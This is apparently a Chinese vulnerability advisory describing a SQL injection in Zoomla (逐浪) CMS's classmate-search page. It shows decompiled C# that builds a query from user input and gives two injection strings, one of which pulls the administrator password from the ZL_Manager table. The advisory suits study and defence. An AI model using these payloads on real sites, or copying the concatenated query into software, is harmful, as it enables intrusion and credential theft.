逐浪cms sql注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: http://www.zoomla.cn/down/2242.shtml 20140725更新. ### 详细说明: 前台注册(新版集成了N多功能)并登陆,会员中心处,http://demo.zoomla.cn/User/UserZone/School/SchoolFellow.aspx,查找同学处存在注入. ``` /User/UserZone/School/SchoolFellow.aspx <%@ page language="C#" autoeventwireup="true" inherits="User_UserZone_School_SchoolFellow, App_Web_tgw2vs0x" enableEventValidation="false" viewStateEncryptionMode="Never" %> ``` 反编译App_Web_tgw2vs0x.dll ``` App_Web_tgw2vs0x.User_UserZone_School_SchoolFellow protected void Button1_Click(object sender, EventArgs e) { int num2; DataTable table = this.st.Select_ByValue(" * ", " UserID in (select UserID from ZL_UserBase where TrueName like '%" + this.txtName.Text + "%') ", ""); ``` search型注入. z%' and @@version>0 and '%'=' z%' and (select top 1 AdminPassword from ZL_Manager)>0 and '%'='(管理员密码) http://demo.zoomla.cn/User/UserZone/School/SchoolFellow.aspx POST:...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息